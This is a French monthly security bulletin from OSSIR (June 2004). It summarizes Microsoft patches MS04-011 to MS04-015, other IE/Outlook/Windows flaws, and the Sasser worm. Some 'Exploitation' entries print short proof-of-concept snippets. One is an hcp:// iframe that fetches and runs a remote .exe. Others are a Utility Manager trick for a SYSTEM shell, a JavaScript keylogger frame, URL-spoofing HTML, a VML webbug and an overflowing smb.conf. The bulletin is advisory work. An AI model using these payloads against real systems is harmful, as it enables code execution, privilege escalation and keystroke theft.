OSSIR


 

Sécurité des systèmes Windows

Base OSWIN v2

Site expérimental

Dernières mises à jour

Ressources
XP SP2
Guides de sécurité
Outils

Avis de sécurité Windows

Accès à l'ancienne base

Site officiel de l'OSSIR

Forum (N/D)

Contact

Rechercher sur ce site :


The Web OSWIN

Site réalisé, maintenu et hébergé par EdelWeb

Veille OSSIR pour le mois de Juin 2004

Date de création : -
Dernière modification : -

1. Avis Microsoft
2. Autres avis
3. Nouveaux outils
4. Autres infos

Les faits marquants ce mois ci :

  • L'énorme patch cumulatif MS04-011 et son lot de failles critiques
  • La propagation du ver Sasser

Avis Microsoft

 

Alerte MS04-011 Patch cumulatif pour Windows
Référence Microsoft / Mai 2004
Affecte Windows NT4, 2000, XP, 2003
Type de problème

14 failles ont été identifiées (!) :

  1. Débordement de buffer dans LSASS, exploitable à distance
    CAN-2003-0533
    http://www.securityfocus.com/bid/10108

    Source : Carlos Sarraute / Core Security Technologies, eEye
  2. Déni de service sur LDAP, exploitable à distance
    CAN-2003-0663
    http://www.securityfocus.com/bid/10114
  3. Débordement de buffer dans PCT (Private Communications Transport, un module de la librairie SSL), exploitable à distance sur tout module Windows utilisant SSL
    CAN-2003-0719
    http://www.securityfocus.com/bid/10116

    Source : Internet Security Systems
  4. Débordement de buffer dans Winlogon, exploitable à distance
    CAN-2003-0806
    http://www.securityfocus.com/bid/10126

    Source : Ondrej Sevecek
  5. Débordement de buffer dans le gestionnaire de fichiers Metafile (.EMF), exploitable par le biais d'une image incluse dans une page Web, un email ou un document
    CAN-2003-0906
    http://www.securityfocus.com/bid/10120

    Source : eEye
  6. Vulnérabilité dans le "Help and Support Center", exploitable via une page Web ou un email contenant un lien hcp:// pour injecter des scripts en zone poste de travail
    CAN-2003-0907
    http://www.securityfocus.com/bid/10119

    Source : iDefense, Jouko Pynnönen
  7. Vulnérabilité dans l'"Utility Manager", exploitable localement pour obtenir les droits SYSTEM
    CAN-2003-0908
    http://www.securityfocus.com/bid/10124

    Source : Brett Moore / Security-Assessment, Cesar Cerrudo, Ben Pryor
  8. Vulnérabilité dans le composant "Windows Management", exploitable localement pour obtenir les droits SYSTEM
    CAN-2003-0909
    http://www.securityfocus.com/bid/10125

    Source : Erik Kamphuis / LogicaCMG (en partenariat avec les impôts Hollandais)
  9. Vulnérabilité dans la gestion de la "Local Descriptor Table" (LDT), exploitable localement pour lire et écrire dans la mémoire du noyau (et obtenir les droits SYSTEM)
    CAN-2003-0910
    http://www.securityfocus.com/bid/10122

    Source : eEye
  10. Débordement de buffer dans le gestionnaire de protocole H.323, exploitable à distance
    CAN-2004-0117
    http://www.securityfocus.com/bid/10111
  11. Vulnérabilité dans la "Virtual DOS Machine", exploitable localement pour lire et écrire dans la mémoire du noyau (et obtenir les droits SYSTEM)
    CAN-2004-0118
    http://www.securityfocus.com/bid/10117

    Source : eEye
  12. Débordement de buffer dans la négociation SSP (Security Support Provider), exploitable à distance
    CAN-2004-0119
    http://www.securityfocus.com/bid/10113

    Source : NSFOCUS Security Team (http://www.nsfocus.com/english/homepage/research/0401.htm)
  13. Vulnérabilité SSL, exploitable à distance
    CAN-2004-0120
    http://www.securityfocus.com/bid/10115

    Source : John Lampe / Tenable Network Security
  14. Vulnérabilité de type "double free" dans le parseur ASN.1, exploitable à distance
    CAN-2004-0123
    http://www.securityfocus.com/bid/10118

    Source : Foundstone, Qualys
Exploitation

Les failles 1, 3, 5, 6, 7, 9, 11, 12, 13 ont été documentées en détail et peuvent faire l'objet d'une exploitation active.

La faille n°1 est exploitée par le ver Sasser.

La faille n°7 est particulièrement simple à mettre en oeuvre : sous Windows XP, appeller l'Utility Manager avec "Windows + U", faire "Aide", "Atteindre une URL", "CMD.EXE" pour obtenir un shell SYSTEM.

Avis de l'OSSIR

Ce patch corrige de nombreuses vulnérabilités critiques et devrait être appliqué sur tous les postes et serveurs.

L'une de ces vulnérabilités est activement exploitée par le ver Sasser.

Toutefois des effets de bord importants ont été mentionnés dans les groupes de discussion sur Internet, il faut donc appliquer ce correctif avec prudence. Il est regrettable que Microsoft ne fournisse pas de correctif individuel pour chacune des vulnérabilités identifiées, car toutes ne sont pas de même niveau.

 

Alerte MS04-012 Patch cumulatif pour RPC/DCOM
Référence Microsoft / Mai 2004
Affecte Windows NT4, 2000, XP, 2003
Type de problème

4 nouvelles vulnérabilités impactant les protocoles RPC et/ou DCOM ont été publiées :

  1. Déni de service via RPC, lorsque le patch MS03-039 est installé
    CAN-2003-0813

    Source : eEye
  2. Déni de service sur RPCSS
    CAN-2004-0116
    http://www.securityfocus.com/bid/10127

    Source : eEye
  3. Déni de service via RPC sur HTTP
    CAN-2003-0807
    http://www.securityfocus.com/bid/10123

    Source : Qualys
  4. Divulgation d'information via un appel "Object Identity"
    CAN-2004-0124
    http://www.securityfocus.com/bid/10121

    Source : Todd Sabin / BindView
Exploitation

Les failles 1 et 2 ont été documentées en détail et peuvent faire l'objet d'une exploitation active.

Avis de l'OSSIR

Il est recommandé d'appliquer ces patchs afin d'améliorer la stabilité du système RPC/DCOM, (trop) rapidement patché après la propagation du ver Blaster.

 

Alerte MS04-013 Patch cumulatif pour Outlook Express
Référence Microsoft / Avril 2004
Affecte Outlook Express (toutes versions : Windows NT4, 2000, XP, 2003)
Type de problème Bogues récurrents dans le moteur MHTML d'Outlook Express, exploités par exemple dans la série des "ms-its".
Exploitation

Exécution de code en zone poste de travail via une page Web ou un email malformé.

Avis de l'OSSIR

Cette famille de bogues est sérieuse et facile à exploiter. Elle est utilisée par de nombreux codes malveillants (virus mais aussi spywares). Cette vulnérabilité peut être activée par un lien "ms-its:", même si le client par défaut n'est ni IE ni OE.

Il est fortement recommandé d'appliquer ce patch.

 

Alerte MS04-014 Vulnérabilité Jet
Référence Matt Thompson / Aberdeen IT + Microsoft / Avril 2004
Affecte

Moteur Jet 4.0, fourni en standard dans Windows NT4, 2000, XP, 2003.

Type de problème

Débordement de buffer dans le moteur de base de données Jet.
CAN-2004-0197
http://www.securityfocus.com/bid/10112

Exploitation

Ce débordement de buffer est exploitable à distance, par l'envoi d'une réponse malformée à un "broadcast" Jet. Ces broadcasts sont émis lorsque le moteur Jet cherche à se connecter à une base de données distante.

Avis de l'OSSIR

Ce bogue est difficilement exploitable par un virus ou un ver, car il n'est exploitable qu'en réponse à une action du client sur le réseau local.

 

Alerte MS04-015 Vulnérabilité dans le Centre d'Aide et de Support
Référence Morning Wood + Microsoft / Mai 2004
Affecte Windows XP, 2003
Type de problème Exécution de code dans le contexte de l'utilisateur via un lien "hcp://".
Exploitation

<iframe src="hcp://system/DVDUpgrd/dvdupgrd.htm?website=site.com/malicieux.exe" width="1" height="1"></iframe>

Avis de l'OSSIR

La fonction "Centre d'Aide et du Support" a fait l'objet de nombreux avis de sécurité. Elle est peu utilisée et gagnerait à pouvoir être désactivée.

Cette vulnérabilité peut être exploitée par un virus, il est donc recommandé d'appliquer le correctif. L'impact sur les fonctionnalités du système sera limité, car la fonction "Centre d'Aide et du Support" est de totue façon peu usitée en entreprise.

Mise à jour de bulletins

Avril 2004 :

  • MS00-082, MS01-041, MS02-011, MS03-046 : disponibilité des patches Exchange 5.0

Mai 2004 :

Autres avis

 

Alerte 4 bogues dans le moteur de décompression LHA
Référence

CAN-2004-0234, CAN-2004-0235
Avril 2004

Affecte

Tout produit basé sur le moteur LHA public, en particulier les outils antivirus.

Type de problème

2 "buffer overflow" exploitables,
2 "directory traversal" permettant de sortir du chemin de décompression d'origine.

Exploitation

Des preuves de concept permettant d'exécuter du code lors de l'utilisation de la commande LHA sous Linux ont été publiés sur Internet.

Avis de l'OSSIR

Le format de compression LHA n'est quasiment plus utilisé, mais tous les outils antivirus le supporte.

Ces bogues sont graves, car ils permettent d'exécuter du code conçu par l'attaquant lors du contrôle antivirus d'une archive LHA soit sur le client final, soit sur la passerelle de messagerie.

Tous les éditeurs affectés doivent mettre à jour leurs produits. En attendant il est fortement recommandé de détruire toute pièce jointe LHA avant toute forme d'analyse antivirus.

 

Alerte Bogues IE multiples (BugTraq)
Référence
  1. http://www.securityfocus.com/bid/9924
  2. http://www.securityfocus.com/bid/10023
  3. http://www.securityfocus.com/bid/10056
  4. http://www.securityfocus.com/bid/10057
  5. http://www.securityfocus.com/bid/10073
  6. http://www.securityfocus.com/bid/10097
  7. http://www.securityfocus.com/bid/10098
  8. http://www.securityfocus.com/bid/10144
  9. http://www.securityfocus.com/bid/10248
  10. http://www.securityfocus.com/bid/10308
  11. http://www.securityfocus.com/bid/10345

Tous publiés entre avril et mai 2004

Affecte IE / OE / Explorateur Windows (versions non précisées, par défaut 6.0)
Type de problème
  1. Déni de service de l'explorateur Windows
  2. Modification de la barre de statut via un formulaire
  3. Débordement de buffer dans le composant MSWebDVD
  4. Déni de service IE via Flash Player
  5. Crash IE trivial
  6. "Bombe" BMP (58 octets -> 51,539,607,528 octets)
  7. Crash OE en l'absence d'en-tête "FROM:"
  8. Crash OE/Outlook en présence d'un caractère NULL
  9. Spoofing SSL via le tag META REFRESH
  10. Masquage d'URL via un "imagemap"
  11. Masquage d'URL dans OE
Exploitation
  1. shell://[...].exe
  2. http://www.malware.com/not-so-good.zip
  3. N/D
  4. LoadMovie 1,"xxx.swf"
  5. <iframe src="?">
  6. http://www.4rman.com/exploits/tinybmp.htm
  7. http://www.4rman.com/exploits/whosendthis.zip
  8. Créer un message avec un caractère NULL
  9. <HTML><HEAD>
    <meta http-equiv="REFRESH" content="0;url=https://www.example.com/">
    </HEAD><BODY onUnload='window.location=""'></BODY></HTML>
  10. http://www.kurczaba.com/securityadvisories/0405132poc.htm
  11. <BASE href=http://www.example1.com target=_top>
    <A href="http://www.example2.com">http://www.example1.com</A>
Avis de l'OSSIR

Il devient difficile de suivre les vulnérabilités IE/OE/Outlook ...

 

Alerte Bogues IE multiples (non confirmés par BugTraq)
Référence
  1. http://www.malware.com/shell.game.html
  2. http://www.acrossecurity.com/aspr/ASPR-2004-01-20-1-PUB.txt
  3. N/D

Tous publiés entre avril et mai 2004

Affecte IE / OE / Explorateur Windows (versions non précisées, par défaut 6.0)
Type de problème
  1. Cross-zone scripting
  2. Déni de service IE/OE/Outlook
  3. IE permet d'imprimer sans confirmation :-)
Exploitation
  1. <a href="shell:Cache">
  2. http://<hostname>%00%00
  3. window.print()
Avis de l'OSSIR

Il devient difficile de suivre les vulnérabilités IE/OE/Outlook ...

 

Alerte Débordement de buffer dans le traitement des noms SMB longs
Référence http://www.securityfocus.com/bid/10213
Affecte Windows NT4, 2000, XP
Type de problème

Débordement de buffer exploitable lorsque le client Windows essaie de se connecter à un serveur SMB avec des noms de répertoire arbitrairement longs.

(Ce bogue ne peut être exploité que si le serveur distant autorise les noms de répertoire arbitrairement longs, ce qui est le cas de Samba).

Exploitation Créer le fichier smb.conf suivant :
[AAA...AAAA]
comment = bug
path = /tmp/testfolder
public = yes
writable = yes
printable = no
browseable = yes
write list = @trymywingchung
Avis de l'OSSIR

Ce bogue n'est pas exploitable par un virus ou un ver, il ne peut être utilisé que sur un LAN dans le cas d'une intrusion manuelle ciblée.

 

Alerte Bogue ISAPI générique
Référence http://www.securityfocus.com/bid/9963
Affecte Tout filtre ISAPI compilé avec Visual Studio 6 + MFC
Type de problème Déni de service
Exploitation Par envoi massif de commandes POST, il est possible de provoquer le crash du filtre et donc du serveur Web IIS.
Avis de l'OSSIR

Bien qu'anecdotique en termes d'exploitation "grandeur nature", ce bogue est un cas d'école en ce qui concerne les risques liés aux bibliothèques partagées, a fortiori lorsque celles-ci proviennent du compilateur !

 

Alerte Cross-site scripting dans SharePoint
Référence http://www.securityfocus.com/bid/10043
Affecte SharePoint Portal 2001 pre-SP3
Type de problème Cross-site scripting
Exploitation N/D
Avis de l'OSSIR

Malgré leur simplicité de détection, les bogues de cross-site scripting ne sont pas en voie d'exctinction ...

 

Alerte Divulgation d'information via une requête GET malformée
Référence http://www.securityfocus.com/bid/10292
Affecte ASP.NET
Type de problème Divulgation d'information dans les messages d'erreur.
Exploitation N/D
Avis de l'OSSIR

En l'absence de détails techniques, cette faille est difficilement qualifiable.

De manière générale il est souhaitable d'utiliser un Reverse Proxy et de filtrer en sortie les messages d'erreur, surtout lorsque ceux-ci contiennent des mots clés de type "C:\".

 

Alerte Emplacement du cache des images prédictible
Référence http://www.securityfocus.com/bid/10307
Affecte Outlook 2003
Type de problème Emplacement du cache prédictible : en combinant cette vulnérabilité avec une vulnérabilité d'exécution locale (de type MS-ITS), il est possible d'exécuter un script dans la zone poste de travail via un email malveillant.
Exploitation

<img src="malware.htm" style="display:none"> : charge "malware.htm" dans un répertoire prédictible.

Avis de l'OSSIR

Cette faille en soi n'est pas dangereuse, mais la possibilité pour l'attaquant de télécharger des scripts à un emplacement prédictible est un prérequis à l'exploitation de beaucoup de failles IE/OE/Outlook.

 

Alerte Possibilité de "webbug" malgré les protections natives
Référence http://www.securityfocus.com/bid/10323
Affecte Outlook 2003
Type de problème

Fuite d'information.

Outlook 2003 possède une option (activée par défaut) permettant d'interdire le chargement des éléments externes au message (images liées). Cette technique est souvent utilisée par les spammeurs pour confirmer la lecture d'un message.

Exploitation

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; HEIGHT: 200px" src = "http://www.example.com/duh.txt#malware"></v:vmlframe>
<HTML><HEAD>
<STYLE>v\:* { behavior: url(#default#VML); } </STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD></HTML>

Avis de l'OSSIR

N/D

 

Alerte Masquage d'URL dans les clients de messagerie
Référence http://www.securityfocus.com/bid/10324
Affecte Outlook (toutes versions) + autres clients (non mentionnés ici)
Type de problème Masquage du lien cible.
Exploitation http://drs.yahoo.com/example.com/NEWS/*http://slashdot.org/#http://drs.yahoo.com/www.example.com/NEWS
Avis de l'OSSIR

N/D

 

Alerte Inclusion directe du fichier ZIP dans le message
Référence Malware / Mai 2004
Affecte Outlook (versions non précisées)
Type de problème Le contenu du message lui-même est un fichier ZIP (il n'y a pas de pièce jointe).
Exploitation

http://www.malware.com/eml.zip

MIME-Version: 1.0
Content-Type: application/x-zip-compressed
Content-Transfer-Encoding: binary
X-Source: 06.03.04 http://www.malware.com
PK…

Avis de l'OSSIR

Cette faille en soi n'est pas dangereuse, sauf si l'environnement d'exécution du client souffre d'un bogue permettant d'exécuter directement le contenu d'un fichier ZIP ou que le client lui-même est victime d'un tel bogue ...


Alerte Cross-site scripting par modification du focus
Référence iDefense / Mai 2004
Affecte IE (versions non précisées)
Type de problème Le contenu du message lui-même est un fichier ZIP (il n'y a pas de pièce jointe).
Exploitation

<html><head><script>
var keylog=''; document.onkeypress = function ()
{ k = window.event.keyCode; window.status = keylog += String.fromCharCode(k) + '[' + k +']'; }
</script></head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset></html>

Avis de l'OSSIR

N/D


Nouveaux outils

 

  • XP SP2 Demo Code

http://www.microsoft.com/downloads/details.aspx?FamilyID=f87cf701-4e68-4e9e-ade5-59d4d40d8e23&DisplayLang=en

  • Une implémentation de SUID sous Windows, par les créateurs de SecureEXE, SecureNT, SecureStack

http://www.neovalens.com/

 

Autres infos

 

  • Propagation du ver Sasser

Ver "classique" : se connecte sur le port TCP/445, exploite la faille LSA MS04-011, récupère le code viral par FTP, ouvre une backdoor. Il connait pourtant un grand succès : AFP (plusieurs heures d'interruption), commission européenne (1 000 PC infectés), poste taiwanaise (1 600 PC), poste allemande (300 000 PC), gardes côtes anglais.

Remarque : le code du ver est bogué - il contient un "buffer overflow" exploitable :-)

Son auteur présumé a été arrêté sur dénonciation (suite à la prime de 250,000$ promise par Microsoft), il s'agirait d'un allemand de 18 ans (Sven Jaschan).
http://www.microsoft.com/presspass/press/2004/may04/05-08SasserTelePR.asp
Il pourrait également être à l'origine du virus NetSky.
http://news.bbc.co.uk/1/hi/world/europe/3695857.stm
Le ver Sasser-E, identifié 3h45 après l'arrestation, est un "gentil" ver qui prévient l'utilisateur de la faille.

  • L'auteur du virus Agobot / Phatbot aurait été arrêté, il s'agirait d'un allemand de 21 ans.

 

  • Le point sur les avancées en matière de sécurité (par Bill Gates) - en Français

http://www.microsoft.com/france/apropos/entreprise/bulletins/20040331-security-fr.asp

  • Accord amiable Sun / Microsoft signé le 2 avril 2004

http://www.microsoft.com/france/cp/2004/4/info.asp?mar=/france/cp/2004/4/02040401_a56.html

  • Site "anti spyware" de Microsoft

http://www.microsoft.com/security/articles/spyware.asp

  • Article Microsoft : "I Got Hacked, What Do I Do ?"

http://www.microsoft.com/technet/community/columns/secmgmt/sm0504.mspx

  • "Users who have expired passwords can still log on to the domain if the FQDN is exactly eight characters long in Windows 2000"

http://support.microsoft.com/?id=830847

  • Adoption de la loi sur l'Économie Numérique (LEN) en bonne voie …